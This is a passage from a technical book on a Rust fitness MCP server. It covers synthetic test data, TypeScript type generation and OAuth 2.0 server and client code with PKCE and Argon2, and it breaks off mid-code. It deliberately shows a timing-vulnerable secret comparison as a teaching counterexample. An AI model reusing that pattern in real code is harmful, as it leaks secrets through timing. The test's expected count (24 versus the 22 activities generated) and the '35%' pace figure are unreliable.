Rust idioms:
#[must_use]: Ensures builder methods aren’t called without using the result- Borrowing
&mut self.rng: Shares RNG state across builders without cloning - Clippy pragmas: Documents why
const fnisn’t applicable (mutable state)
Training Pattern Generation
The builder generates realistic training patterns for testing intelligence algorithms:
Source: tests/helpers/synthetic_data.rs:69-132
#![allow(unused)]
fn main() {
/// Generate a series of activities following a specific pattern
#[must_use]
pub fn generate_pattern(&mut self, pattern: TrainingPattern) -> Vec<Activity> {
match pattern {
TrainingPattern::BeginnerRunnerImproving => self.beginner_runner_improving(),
TrainingPattern::ExperiencedCyclistConsistent => self.experienced_cyclist_consistent(),
TrainingPattern::Overtraining => self.overtraining_scenario(),
TrainingPattern::InjuryRecovery => self.injury_recovery(),
}
}
/// Beginner runner improving 35% over 6 weeks
/// Realistic progression for new runner building fitness
fn beginner_runner_improving(&mut self) -> Vec<Activity> {
let mut activities = Vec::new();
let base_date = Utc::now() - Duration::days(42); // 6 weeks ago
// Week 1-2: 3 runs/week, 20 min @ 6:30/km pace
for week in 0..2 {
for run in 0..3 {
let date = base_date + Duration::days(week * 7 + run * 2);
let activity = self
.generate_run()
.duration_minutes(20)
.pace_min_per_km(6.5)
.start_date(date)
.heart_rate(150, 165)
.build();
activities.push(activity);
}
}
// Week 3-4: 4 runs/week, 25 min @ 6:00/km pace (improving)
for week in 2..4 {
for run in 0..4 {
let date = base_date + Duration::days(week * 7 + (run * 2));
let activity = self
.generate_run()
.duration_minutes(25)
.pace_min_per_km(6.0)
.start_date(date)
.heart_rate(145, 160)
.build();
activities.push(activity);
}
}
// Week 5-6: 4 runs/week, 30 min @ 5:30/km pace (improved 35%)
for week in 4..6 {
for run in 0..4 {
let date = base_date + Duration::days(week * 7 + (run * 2));
let activity = self
.generate_run()
.duration_minutes(30)
.pace_min_per_km(5.5)
.start_date(date)
.heart_rate(140, 155)
.build();
activities.push(activity);
}
}
activities
}
}
Pattern characteristics:
- Realistic progression: 35% improvement over 6 weeks (physiologically plausible)
- Gradual adaptation: Increasing volume (20->25->30 min) and intensity (6.5->6.0->5.5 min/km)
- Heart rate efficiency: Lower HR at faster paces indicates improved fitness
Synthetic Provider for Testing
The synthetic provider implements the FitnessProvider trait without OAuth:
Source: tests/helpers/synthetic_provider.rs:16-75
#![allow(unused)]
fn main() {
/// Synthetic provider for testing intelligence algorithms without OAuth
///
/// Provides pre-loaded activity data for automated testing, allowing
/// validation of metrics calculations, trend analysis, and predictions
/// without requiring real API connections or OAuth tokens.
///
/// # Thread Safety
///
/// All data access is protected by `RwLock` for thread-safe concurrent access.
/// Multiple tests can safely use the same provider instance.
pub struct SyntheticProvider {
/// Pre-loaded activities for testing
activities: Arc<RwLock<Vec<Activity>>>,
/// Activity lookup by ID for fast access
activity_index: Arc<RwLock<HashMap<String, Activity>>>,
/// Provider configuration
config: ProviderConfig,
}
impl SyntheticProvider {
/// Create a new synthetic provider with given activities
#[must_use]
pub fn with_activities(activities: Vec<Activity>) -> Self {
// Build activity index for O(1) lookup by ID
let mut index = HashMap::new();
for activity in &activities {
index.insert(activity.id.clone(), activity.clone());
}
Self {
activities: Arc::new(RwLock::new(activities)),
activity_index: Arc::new(RwLock::new(index)),
config: ProviderConfig {
name: "synthetic".to_owned(),
auth_url: "http://localhost/synthetic/auth".to_owned(),
token_url: "http://localhost/synthetic/token".to_owned(),
api_base_url: "http://localhost/synthetic/api".to_owned(),
revoke_url: None,
default_scopes: vec!["activity:read_all".to_owned()],
},
}
}
/// Create an empty provider (no activities)
#[must_use]
pub fn new() -> Self {
Self::with_activities(Vec::new())
}
/// Add an activity to the provider dynamically
pub fn add_activity(&self, activity: Activity) {
{
let mut activities = self
.activities
.write()
.expect("Synthetic provider activities RwLock poisoned");
{
let mut index = self
.activity_index
.write()
.expect("Synthetic provider index RwLock poisoned");
index.insert(activity.id.clone(), activity.clone());
} // Drop index early
activities.push(activity);
} // RwLock guards dropped here
}
}
}
Design patterns:
Arc<RwLock<T>>: Thread-safe shared ownership with interior mutability- Dual indexing: Vec for ordering + HashMap for O(1) ID lookups
- Early lock release: Explicit scopes to drop
RwLockguards before outer scope
Rust Idioms: Rwlock Scoping
Source: tests/helpers/synthetic_provider.rs:84-101
#![allow(unused)]
fn main() {
pub fn add_activity(&self, activity: Activity) {
{
let mut activities = self
.activities
.write()
.expect("Synthetic provider activities RwLock poisoned");
{
let mut index = self
.activity_index
.write()
.expect("Synthetic provider index RwLock poisoned");
index.insert(activity.id.clone(), activity.clone());
} // Drop index early
activities.push(activity);
} // RwLock guards dropped here
}
}
Idiom: Nested scopes force early lock release. The inner index write lock drops before updating activities, preventing unnecessary lock contention.
Why this matters: Holding multiple locks simultaneously can cause deadlocks. Explicit scoping ensures locks are released in correct order.
Type Safety Guarantees
The tools-to-types system provides multiple layers of type safety:
┌─────────────────────────────────────────────────────────────┐
│ TYPE SAFETY LAYERS │
├─────────────────────────────────────────────────────────────┤
│ 1. Rust Schema Definitions (compile-time) │
│ - ToolSchema struct enforces valid JSON Schema │
│ - Serde validates serialization correctness │
├─────────────────────────────────────────────────────────────┤
│ 2. JSON-RPC Runtime Validation │
│ - Server validates arguments against inputSchema │
│ - Invalid params return -32602 error code │
├─────────────────────────────────────────────────────────────┤
│ 3. TypeScript Interface Generation (build-time) │
│ - Generated types match server schemas exactly │
│ - TypeScript compiler validates SDK usage │
├─────────────────────────────────────────────────────────────┤
│ 4. Synthetic Testing (test-time) │
│ - Deterministic data validates algorithm correctness │
│ - No OAuth dependencies for unit tests │
└─────────────────────────────────────────────────────────────┘
Schema-Driven Development Workflow
The complete workflow ensures server and client stay synchronized:
┌────────────────────────────────────────────────────────────┐
│ SCHEMA-DRIVEN WORKFLOW │
└────────────────────────────────────────────────────────────┘
1. Define tool in Rust (src/mcp/schema.rs)
|
pub fn create_get_activities_tool() -> ToolSchema { ... }
2. Add to tool registry (src/mcp/schema.rs)
|
pub fn get_tools() -> Vec<ToolSchema> {
vec![create_get_activities_tool(), ...]
}
3. Start Pierre server
|
cargo run --bin pierre-mcp-server
4. Generate TypeScript types
|
cd sdk && npm run generate-types
5. TypeScript SDK uses generated types
|
import { GetActivitiesParams } from './types';
const params: GetActivitiesParams = { provider: "strava", limit: 10 };
6. Compile-time type checking
|
// TypeScript compiler validates:
// - provider is required
// - limit is optional number
// - invalid_field causes compile error
Key benefit: Changes to Rust tool schemas automatically propagate to TypeScript SDK after regeneration.
Testing with Synthetic Data
Combine synthetic data with the provider for comprehensive tests:
Conceptual usage (from tests/intelligence_synthetic_helpers_test.rs):
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_beginner_progression_detection() {
// Generate realistic training data
let mut builder = SyntheticDataBuilder::new(42);
let activities = builder.generate_pattern(TrainingPattern::BeginnerRunnerImproving);
// Load into synthetic provider
let provider = SyntheticProvider::with_activities(activities);
// Test intelligence algorithms without OAuth
let result = provider.get_activities(Some(50), None).await.unwrap();
// Verify progression pattern detected
assert_eq!(result.items.len(), 24); // 6 weeks * 4 runs/week
// ... validate metrics, trends, etc.
}
}
Testing benefits:
- No OAuth: Tests run without network or external APIs
- Deterministic: Seeded RNG ensures reproducible results
- Realistic: Patterns match real-world training data
- Fast: In-memory provider, no database required
Key Takeaways
-
Single source of truth: Rust tool schemas generate both runtime validation and TypeScript types.
-
Automated workflow:
npm run generate-typesfetches schemas from running server and generates interfaces. -
JSON Schema to TypeScript: Script maps JSON Schema types to idiomatic TypeScript (union types, optional properties, generics).
-
Type-safe tooling: Generated
ToolParamsMapenables compile-time validation of tool calls. -
Synthetic data: Deterministic builder pattern generates realistic fitness data for testing without OAuth.
-
Builder pattern: Fluent API with
#[must_use]prevents common test setup errors. -
Thread-safe testing: Synthetic provider uses
Arc<RwLock<T>>for concurrent test access. -
Schema-driven development: Changes to server tools automatically flow to SDK after regeneration.
-
Training patterns: Pre-built scenarios (beginner progression, overtraining, injury recovery) test intelligence algorithms.
-
Type safety layers: Compile-time (Rust + TypeScript), runtime (JSON-RPC validation), and test-time (synthetic data) guarantee correctness.
End of Part IV: SDK & Type System
You’ve completed the SDK and type system implementation. You now understand:
- SDK bridge architecture (Chapter 13)
- Automated type generation from server schemas (Chapter 14)
Next Chapter: Chapter 15: OAuth 2.0 Server Implementation - Begin Part V by learning how Pierre implements OAuth 2.0 server functionality for fitness provider authentication.
Chapter 15: OAuth 2.0 Server Implementation
This chapter explores how Pierre implements a full OAuth 2.0 authorization server for secure MCP client authentication. You’ll learn about RFC 7591 dynamic client registration, PKCE (RFC 7636), authorization code flow, and JWT-based access tokens.
OAuth 2.0 Server Architecture
Pierre implements a standards-compliant OAuth 2.0 authorization server:
┌──────────────┐ ┌──────────────┐
│ MCP Client │ │ Pierre │
│ (SDK) │ │ OAuth 2.0 │
│ │ │ Server │
└──────────────┘ └──────────────┘
│ │
│ 1. POST /oauth2/register │
│ (dynamic client registration) │
├─────────────────────────────────►│
│ │
│ client_id, client_secret │
│◄─────────────────────────────────┤
│ │
│ 2. GET /oauth2/authorize │
│ (with PKCE code_challenge) │
├─────────────────────────────────►│
│ │
│ Redirect to login page │
│◄─────────────────────────────────┤
│ │
│ 3. POST /oauth2/login │
│ (user credentials) │
├─────────────────────────────────►│
│ │
│ Redirect with auth code │
│◄─────────────────────────────────┤
│ │
│ 4. POST /oauth2/token │
│ (exchange code + verifier) │
├─────────────────────────────────►│
│ │
│ access_token (JWT) │
│◄─────────────────────────────────┤
OAuth 2.0 flow: Pierre supports authorization code flow with PKCE (mandatory for security).
OAuth Context and Routes
The OAuth server shares context across all endpoint handlers:
Source: src/routes/oauth2.rs:36-49
#![allow(unused)]
fn main() {
/// OAuth 2.0 server context shared across all handlers
#[derive(Clone)]
pub struct OAuth2Context {
/// Database for client and token storage
pub database: Arc<Database>,
/// Authentication manager for JWT operations
pub auth_manager: Arc<AuthManager>,
/// JWKS manager for public key operations
pub jwks_manager: Arc<JwksManager>,
/// Server configuration
pub config: Arc<ServerConfig>,
/// Rate limiter for OAuth endpoints
pub rate_limiter: Arc<OAuth2RateLimiter>,
}
}
Route registration:
Source: src/routes/oauth2.rs:69-97
#![allow(unused)]
fn main() {
impl OAuth2Routes {
/// Create all OAuth 2.0 routes with context
pub fn routes(context: OAuth2Context) -> Router {
Router::new()
// RFC 8414: OAuth 2.0 Authorization Server Metadata
.route(
"/.well-known/oauth-authorization-server",
get(Self::handle_discovery),
)
// RFC 7517: JWKS endpoint
.route("/.well-known/jwks.json", get(Self::handle_jwks))
// RFC 7591: Dynamic Client Registration
.route("/oauth2/register", post(Self::handle_client_registration))
// OAuth 2.0 Authorization endpoint
.route("/oauth2/authorize", get(Self::handle_authorization))
// OAuth 2.0 Token endpoint
.route("/oauth2/token", post(Self::handle_token))
// Login page and submission
.route("/oauth2/login", get(Self::handle_oauth_login_page))
.route("/oauth2/login", post(Self::handle_oauth_login_submit))
// Token validation endpoints
.route(
"/oauth2/validate-and-refresh",
post(Self::handle_validate_and_refresh),
)
.route("/oauth2/token-validate", post(Self::handle_token_validate))
.with_state(context)
}
}
}
Endpoints:
/.well-known/oauth-authorization-server: OAuth discovery (RFC 8414)/.well-known/jwks.json: Public keys for JWT verification/oauth2/register: Dynamic client registration (RFC 7591)/oauth2/authorize: Authorization endpoint (user consent)/oauth2/token: Token endpoint (code exchange)
OAuth Discovery Endpoint
The discovery endpoint advertises server capabilities (RFC 8414):
Source: src/routes/oauth2.rs:100-128
#![allow(unused)]
fn main() {
/// Handle OAuth 2.0 discovery (RFC 8414)
async fn handle_discovery(State(context): State<OAuth2Context>) -> Json<serde_json::Value> {
let issuer_url = context.config.oauth2_server.issuer_url.clone();
// Use spawn_blocking for JSON serialization (CPU-bound operation)
let discovery_json = tokio::task::spawn_blocking(move || {
serde_json::json!({
"issuer": issuer_url,
"authorization_endpoint": format!("{issuer_url}/oauth2/authorize"),
"token_endpoint": format!("{issuer_url}/oauth2/token"),
"registration_endpoint": format!("{issuer_url}/oauth2/register"),
"jwks_uri": format!("{issuer_url}/.well-known/jwks.json"),
"grant_types_supported": ["authorization_code", "client_credentials", "refresh_token"],
"response_types_supported": ["code"],
"token_endpoint_auth_methods_supported": ["client_secret_post", "client_secret_basic"],
"scopes_supported": ["fitness:read", "activities:read", "profile:read"],
"response_modes_supported": ["query"],
"code_challenge_methods_supported": ["S256"]
})
})
.await
.unwrap_or_else(|_| {
serde_json::json!({
"error": "internal_error",
"error_description": "Failed to generate discovery document"
})
});
Json(discovery_json)
}
}
Discovery response (example):
{
"issuer": "http://localhost:8081",
"authorization_endpoint": "http://localhost:8081/oauth2/authorize",
"token_endpoint": "http://localhost:8081/oauth2/token",
"registration_endpoint": "http://localhost:8081/oauth2/register",
"jwks_uri": "http://localhost:8081/.well-known/jwks.json",
"grant_types_supported": ["authorization_code", "client_credentials", "refresh_token"],
"response_types_supported": ["code"],
"token_endpoint_auth_methods_supported": ["client_secret_post", "client_secret_basic"],
"scopes_supported": ["fitness:read", "activities:read", "profile:read"],
"response_modes_supported": ["query"],
"code_challenge_methods_supported": ["S256"]
}
Key fields:
code_challenge_methods_supported: ["S256"]: Only SHA-256 PKCE (no plain method for security)grant_types_supported: Authorization code, client credentials, refresh tokentoken_endpoint_auth_methods_supported: Client authentication methods
Dynamic Client Registration (rfc 7591)
MCP clients register dynamically to obtain OAuth credentials:
Source: src/oauth2_server/models.rs:11-26
#![allow(unused)]
fn main() {
/// OAuth 2.0 Client Registration Request (RFC 7591)
#[derive(Debug, Deserialize)]
pub struct ClientRegistrationRequest {
/// Redirect URIs for authorization code flow
pub redirect_uris: Vec<String>,
/// Optional client name for display
pub client_name: Option<String>,
/// Optional client URI for information
pub client_uri: Option<String>,
/// Grant types the client can use
pub grant_types: Option<Vec<String>>,
/// Response types the client can use
pub response_types: Option<Vec<String>>,
/// Scopes the client can request
pub scope: Option<String>,
}
}
Client registration handler:
Source: src/oauth2_server/client_registration.rs:39-108
#![allow(unused)]
fn main() {
/// Register a new OAuth 2.0 client (RFC 7591)
///
/// # Errors
/// Returns an error if client registration validation fails or database storage fails
pub async fn register_client(
&self,
request: ClientRegistrationRequest,
) -> Result<ClientRegistrationResponse, OAuth2Error> {
// Validate request
Self::validate_registration_request(&request)?;
// Generate client credentials
let client_id = Self::generate_client_id();
let client_secret = Self::generate_client_secret()?;
let client_secret_hash = Self::hash_client_secret(&client_secret)?;
// Set default values - only authorization_code by default for security (RFC 8252 best practices)
// Clients must explicitly request client_credentials if needed
let grant_types = request
.grant_types
.unwrap_or_else(|| vec!["authorization_code".to_owned()]);
let response_types = request
.response_types
.unwrap_or_else(|| vec!["code".to_owned()]);
let created_at = Utc::now();
let expires_at = Some(created_at + Duration::days(365)); // 1 year expiry
// Create client record
let client = OAuth2Client {
id: Uuid::new_v4().to_string(),
client_id: client_id.clone(),
client_secret_hash,
redirect_uris: request.redirect_uris.clone(),
grant_types: grant_types.clone(),
response_types: response_types.clone(),
client_name: request.client_name.clone(),
client_uri: request.client_uri.clone(),
scope: request.scope.clone(),
created_at,
expires_at,
};
// Store in database
self.store_client(&client).await.map_err(|e| {
tracing::error!(error = %e, client_id = %client_id, "Failed to store OAuth2 client registration in database");
OAuth2Error::invalid_request("Failed to store client registration")
})?;
// Return registration response
let default_client_uri = Self::get_default_client_uri();
Ok(ClientRegistrationResponse {
client_id,
client_secret,
client_id_issued_at: Some(created_at.timestamp()),
client_secret_expires_at: expires_at.map(|dt| dt.timestamp()),
redirect_uris: request.redirect_uris,
grant_types,
response_types,
client_name: request.client_name,
client_uri: request.client_uri.or(Some(default_client_uri)),
scope: request
.scope
.or_else(|| Some("fitness:read activities:read profile:read".to_owned())),
})
}
}
Security measures:
- Argon2 hashing: Client secrets hashed before storage (never plaintext)
- 365-day expiry: Client registrations expire after 1 year
- Default grant types: Only
authorization_codeby default (least privilege) - Redirect URI validation: URIs validated during registration
Rust Idioms: Argon2 for Credential Hashing
Pierre uses Argon2 (winner of Password Hashing Competition) for client secret hashing:
Conceptual implementation (from client_registration.rs):
#![allow(unused)]
fn main() {
use argon2::{
password_hash::{rand_core::OsRng, PasswordHasher, SaltString},
Argon2,
};
fn hash_client_secret(secret: &str) -> Result<String, OAuth2Error> {
let salt = SaltString::generate(&mut OsRng);
let argon2 = Argon2::default();
let password_hash = argon2
.hash_password(secret.as_bytes(), &salt)
.map_err(|e| OAuth2Error::invalid_request("Failed to hash client secret"))?;
Ok(password_hash.to_string())
}
}
Why Argon2:
- Memory-hard: Resistant to GPU/ASIC attacks
- Tunable: Adjustable time/memory cost parameters
- Winner of PHC: Industry-standard recommendation
- Constant-time: Safe against timing attacks
Authorization Endpoint with PKCE
The authorization endpoint requires PKCE (Proof Key for Code Exchange) for security:
Source: src/oauth2_server/endpoints.rs:70-156
#![allow(unused)]
fn main() {
/// Handle authorization request (GET /oauth/authorize)
///
/// # Errors
/// Returns an error if client validation fails, invalid parameters, or authorization code generation fails
pub async fn authorize(
&self,
request: AuthorizeRequest,
user_id: Option<Uuid>, // From authentication
tenant_id: Option<String>, // From JWT claims
) -> Result<AuthorizeResponse, OAuth2Error> {
// Validate client
let client = self
.client_manager
.get_client(&request.client_id)
.await
.map_err(|e| {
tracing::error!(
"Client lookup failed for client_id={}: {:#}",
request.client_id,
e
);
OAuth2Error::invalid_client()
})?;
// Validate response type
if request.response_type != "code" {
return Err(OAuth2Error::invalid_request(
"Only 'code' response_type is supported",
));
}
// Validate redirect URI
if !client.redirect_uris.contains(&request.redirect_uri) {
return Err(OAuth2Error::invalid_request("Invalid redirect_uri"));
}
// Validate PKCE parameters (RFC 7636)
if let Some(ref code_challenge) = request.code_challenge {
// Validate code_challenge format (base64url-encoded, 43-128 characters)
if code_challenge.len() < 43 || code_challenge.len() > 128 {
return Err(OAuth2Error::invalid_request(
"code_challenge must be between 43 and 128 characters",
));
}
// Validate code_challenge_method - only S256 is allowed (RFC 7636 security best practice)
let method = request.code_challenge_method.as_deref().unwrap_or("S256");
if method != "S256" {
return Err(OAuth2Error::invalid_request(
"code_challenge_method must be 'S256' (plain method is not supported for security reasons)",
));
}
} else {
// PKCE is required for authorization code flow
return Err(OAuth2Error::invalid_request(
"code_challenge is required for authorization_code flow (PKCE)",
));
}
// User authentication required
let user_id =
user_id.ok_or_else(|| OAuth2Error::invalid_request("User authentication required"))?;
// Generate authorization code with tenant isolation and state binding
let tenant_id = tenant_id.unwrap_or_else(|| user_id.to_string());
let auth_code = self
.generate_authorization_code(AuthCodeParams {
client_id: &request.client_id,
user_id,
tenant_id: &tenant_id,
redirect_uri: &request.redirect_uri,
scope: request.scope.as_deref(),
state: request.state.as_deref(),
code_challenge: request.code_challenge.as_deref(),
code_challenge_method: request.code_challenge_method.as_deref(),
})
.await
.map_err(|e| {
tracing::error!(
"Failed to generate authorization code for client_id={}: {:#}",
request.client_id,
e
);
OAuth2Error::invalid_request("Failed to generate authorization code")
})?;
Ok(AuthorizeResponse {
code: auth_code,
state: request.state,
})
}
}
PKCE validation:
- Required:
code_challengemandatory (no fallback to plain OAuth) - S256 only: SHA-256 method required (plain method rejected for security)
- Length validation: 43-128 characters (base64url-encoded SHA-256)
PKCE Flow Explained
PKCE prevents authorization code interception attacks:
Client generates random verifier:
verifier = random(43-128 chars)
Client creates challenge:
challenge = base64url(sha256(verifier))
Authorization request includes challenge:
GET /oauth2/authorize?
client_id=...&
redirect_uri=...&
code_challenge=<challenge>&
code_challenge_method=S256
Server stores challenge with authorization code
Token request includes verifier:
POST /oauth2/token
grant_type=authorization_code&
code=<auth_code>&
code_verifier=<verifier>&
...
Server validates:
if base64url(sha256(verifier)) == stored_challenge:
issue_token()
else:
reject_request()
Security benefit: Even if authorization code is intercepted, attacker cannot exchange it without the original code_verifier (which never leaves the client).
Token Endpoint
The token endpoint exchanges authorization codes for JWT access tokens:
Source: src/oauth2_server/endpoints.rs:163-186
#![allow(unused)]
fn main() {
/// Handle token request (POST /oauth/token)
///
/// # Errors
/// Returns an error if client validation fails or token generation fails
pub async fn token(&self, request: TokenRequest) -> Result<TokenResponse, OAuth2Error> {
// ALWAYS validate client credentials for ALL grant types (RFC 6749 Section 6)
// RFC 6749 Section 6 states: "If the client type is confidential or the client was issued
// client credentials, the client MUST authenticate with the authorization server"
// MCP clients are confidential clients, so authentication is REQUIRED
self.client_manager
.validate_client(&request.client_id, &request.client_secret)
.await
.inspect_err(|e| {
tracing::error!(
client_id = %request.client_id,
grant_type = %request.grant_type,
error = ?e,
"OAuth client validation failed"
);
})?;
match request.grant_type.as_str() {
"authorization_code" => self.handle_authorization_code_grant(request).await,
"client_credentials" => self.handle_client_credentials_grant(request),
"refresh_token" => self.handle_refresh_token_grant(request).await,
_ => Err(OAuth2Error::unsupported_grant_type()),
}
}
}
Grant types:
authorization_code: Exchange authorization code for access token (with PKCE verification)client_credentials: Machine-to-machine authentication (no user context)refresh_token: Renew expired access token without re-authentication
Constant-Time Client Validation
Client credential validation uses constant-time comparison to prevent timing attacks:
Source: src/oauth2_server/client_registration.rs:114-153
#![allow(unused)]
fn main() {
/// Validate client credentials
///
/// # Errors
/// Returns an error if client is not found, credentials are invalid, or client is expired
pub async fn validate_client(
&self,
client_id: &str,
client_secret: &str,
) -> Result<OAuth2Client, OAuth2Error> {
tracing::debug!("Validating OAuth client: {}", client_id);
let client = self.get_client(client_id).await.map_err(|e| {
tracing::warn!("OAuth client {} not found: {}", client_id, e);
OAuth2Error::invalid_client()
})?;
tracing::debug!("OAuth client {} found, validating secret", client_id);
// Verify client secret using constant-time comparison via Argon2
let parsed_hash = PasswordHash::new(&client.client_secret_hash).map_err(|e| {
tracing::error!("Failed to parse stored password hash: {}", e);
OAuth2Error::invalid_client()
})?;
let argon2 = Argon2::default();
if argon2
.verify_password(client_secret.as_bytes(), &parsed_hash)
.is_err()
{
tracing::warn!("OAuth client {} secret validation failed", client_id);
return Err(OAuth2Error::invalid_client());
}
// Check if client is expired
if let Some(expires_at) = client.expires_at {
if Utc::now() > expires_at {
tracing::warn!("OAuth client {} has expired", client_id);
return Err(OAuth2Error::invalid_client());
}
}
tracing::info!("OAuth client {} validated successfully", client_id);
Ok(client)
}
}
Constant-time guarantee: Argon2’s verify_password uses constant-time comparison to prevent timing side-channel attacks.
Rust Idioms: Constant-Time Operations
Timing attack vulnerability:
#![allow(unused)]
fn main() {
// VULNERABLE: Early return leaks information about secret length
if client_secret.len() != stored_secret.len() {
return Err(...); // Attacker learns length immediately
}
for (a, b) in client_secret.bytes().zip(stored_secret.bytes()) {
if a != b {
return Err(...); // Attacker learns position of mismatch
}
}
}
Constant-time solution (Argon2):
#![allow(unused)]
fn main() {
// SECURE: Always takes same time regardless of input
argon2.verify_password(client_secret.as_bytes(), &parsed_hash)
}
Why this matters: Timing attacks can recover secrets character-by-character by measuring response times.
Multi-Tenant OAuth Management
Pierre provides tenant-specific OAuth credential isolation:
Source: src/tenant/oauth_manager.rs:14-46
#![allow(unused)]
fn main() {
/// Credential configuration for storing OAuth credentials
#[derive(Debug, Clone)]
pub struct CredentialConfig {
/// OAuth client ID (public)
pub client_id: String,
/// OAuth client secret (to be encrypted)
pub client_secret: String,
/// OAuth redirect URI
pub redirect_uri: String,
/// OAuth scopes
pub scopes: Vec<String>,
/// User who configured these credentials
pub configured_by: Uuid,
}
/// Per-tenant OAuth credentials with decrypted secret
#[derive(Debug, Clone)]
pub struct TenantOAuthCredentials {
/// Tenant ID that owns these credentials
pub tenant_id: Uuid,
/// OAuth provider name
pub provider: String,
/// OAuth client ID (public)
pub client_id: String,
/// OAuth client secret (decrypted)
pub client_secret: String,
/// OAuth redirect URI
pub redirect_uri: String,
/// OAuth scopes
pub scopes: Vec<String>,
/// Daily rate limit for this tenant
pub rate_limit_per_day: u32,
}
}
Credential resolution:
Source: src/tenant/oauth_manager.rs:76-100
#![allow(unused)]
fn main() {
/// Load OAuth credentials for a specific tenant and provider
///
/// # Errors
///
/// Returns an error if no credentials are found for the tenant/provider combination
pub async fn get_credentials(
&self,
tenant_id: Uuid,
provider: &str,
database: &Database,
) -> Result<TenantOAuthCredentials> {
// Priority 1: Try tenant-specific credentials first (in-memory cache, then database)
if let Some(credentials) = self
.try_tenant_specific_credentials(tenant_id, provider, database)
.await
{
return Ok(credentials);
}
// Priority 2: Fallback to server-level OAuth configuration
if let Some(credentials) = self.try_server_level_credentials(tenant_id, provider) {
return Ok(credentials);
}
// No credentials found - return error
Err(AppError::not_found(format!(
"No OAuth credentials configured for tenant {} and provider {}. Configure {}_CLIENT_ID and {}_CLIENT_SECRET environment variables, or provide tenant-specific credentials via the MCP OAuth configuration tool.",
tenant_id, provider, provider.to_uppercase(), provider.to_uppercase()
)).into())
}
}
Credential priority:
- Tenant-specific credentials (highest priority): Custom OAuth apps per tenant
- Server-level credentials (fallback): Shared OAuth apps from environment variables
- Error (no credentials): Inform user how to configure
OAuth Rate Limiting
Pierre implements rate limiting for OAuth endpoints:
Source: src/routes/oauth2.rs:136-149
#![allow(unused)]
fn main() {
async fn handle_client_registration(
State(context): State<OAuth2Context>,
ConnectInfo(addr): ConnectInfo<SocketAddr>,
Json(request): Json<ClientRegistrationRequest>,
) -> Response {
// Extract client IP from connection using Axum's ConnectInfo extractor
let client_ip = addr.ip();
let rate_status = context.rate_limiter.check_rate_limit("register", client_ip);
if rate_status.is_limited {
return (
StatusCode::TOO_MANY_REQUESTS,
Json(serde_json::json!({
"error": "too_many_requests",
"error_description": "Rate limit exceeded"
})),
)
.into_response();
}
// ... continue registration
}
}
Rate-limited endpoints:
/oauth2/register: Prevent client registration spam/oauth2/authorize: Prevent authorization request floods/oauth2/token: Prevent token exchange brute-forcing
Key Takeaways
-
RFC compliance: Pierre implements RFC 7591 (client registration), RFC 7636 (PKCE), RFC 8414 (discovery).
-
PKCE mandatory: Authorization code flow requires PKCE with SHA-256 (no plain method).
-
Argon2 hashing: Client secrets hashed with Argon2 (memory-hard, constant-time verification).
-
Constant-time validation: Client credential verification prevents timing attacks.
-
JWT access tokens: OAuth access tokens are JWTs (same format as Pierre authentication tokens).
-
Multi-tenant isolation: Tenant-specific OAuth credentials with separate rate limits.
-
Discovery endpoint: RFC 8414 metadata allows clients to auto-discover OAuth configuration.
-
365-day expiry: Client registrations expire after 1 year (security best practice).
-
Rate limiting: OAuth endpoints protected against abuse with IP-based rate limiting.
-
Grant type defaults: Only
authorization_codeby default (least privilege principle).
Next Chapter: Chapter 16: OAuth 2.0 Client for Fitness Providers - Learn how Pierre acts as an OAuth client to connect to fitness providers like Strava and Fitbit.
Chapter 16: OAuth 2.0 Client for Fitness Providers
This chapter explores how Pierre acts as an OAuth 2.0 client to connect to fitness providers like Strava and Fitbit. You’ll learn about the OAuth client implementation, PKCE generation, token management, and provider-specific integrations.
OAuth Client Architecture
Pierre implements a generic OAuth 2.0 client that works with multiple fitness providers:
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Pierre │ │ Fitness │ │ User │
│ Server │ │ Provider │ │ Browser │
│ │ │ (Strava) │ │ │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
│ 1. Generate PKCE params │ │
│ (verifier + challenge) │ │
├─────────────────────────────────┼────────────────────────────────►│
│ │ │
│ 2. Build authorization URL │ │
│ with code_challenge │ │
├─────────────────────────────────┼────────────────────────────────►│
│ │ │
│ │ 3. User authorizes Pierre │
│ │◄────────────────────────────────┤
│ │ │
│ 4. OAuth callback │ │
│◄────────────────────────────────┼─────────────────────────────────┤
│ with authorization code │ │
│ │ │
│ 5. POST /oauth/token │ │
│ (code + code_verifier) │ │
├────────────────────────────────►│ │
│ │ │
│ 6. Access token + refresh token│ │
│◄────────────────────────────────┤ │
│ │ │
│ 7. Store tokens in database │ │
│ │ │
Client role: Pierre initiates OAuth flows with fitness providers to access user data.
OAuth Client Configuration
Each OAuth client needs provider-specific configuration:
Source: src/oauth2_client/client.rs:16-33
#![allow(unused)]
fn main() {
/// OAuth 2.0 client configuration
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct OAuth2Config {
/// OAuth client ID from provider
pub client_id: String,
/// OAuth client secret from provider
pub client_secret: String,
/// Authorization endpoint URL
pub auth_url: String,
/// Token endpoint URL
pub token_url: String,
/// Redirect URI for OAuth callbacks
pub redirect_uri: String,
/// OAuth scopes to request
pub scopes: Vec<String>,
/// Whether to use PKCE for enhanced security
pub use_pkce: bool,
}
}
Configuration fields:
client_id/client_secret: Provider application credentialsauth_url: Provider’s authorization endpoint (e.g.,https://www.strava.com/oauth/authorize)token_url: Provider’s token endpoint (e.g.,https://www.strava.com/oauth/token)redirect_uri: Pierre’s callback URL (e.g.,http://localhost:8081/api/oauth/callback/strava)scopes: Requested permissions (e.g.,["activity:read_all", "profile:read"])use_pkce: Enable PKCE for security (recommended)
PKCE Parameter Generation
Pierre generates PKCE parameters to protect authorization codes:
Source: src/oauth2_client/client.rs:35-70
#![allow(unused)]
fn main() {
/// `PKCE` (Proof Key for Code Exchange) parameters for enhanced `OAuth2` security
#[derive(Debug, Clone)]
pub struct PkceParams {
/// Randomly generated code verifier (43-128 characters)
pub code_verifier: String,
/// SHA256 hash of code verifier, base64url encoded
pub code_challenge: String,
/// Challenge method (always "S256" for SHA256)
pub code_challenge_method: String,
}
impl PkceParams {
/// Generate `PKCE` parameters with `S256` challenge method
#[must_use]
pub fn generate() -> Self {
// Generate a cryptographically secure random code verifier (43-128 characters)
const CHARS: &[u8] = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-._~";
let mut rng = rand::thread_rng();
let code_verifier: String = (0
..crate::constants::network_config::OAUTH_CODE_VERIFIER_LENGTH)
.map(|_| CHARS[rng.gen_range(0..CHARS.len())] as char)
.collect();
// Create S256 code challenge
let mut hasher = Sha256::new();
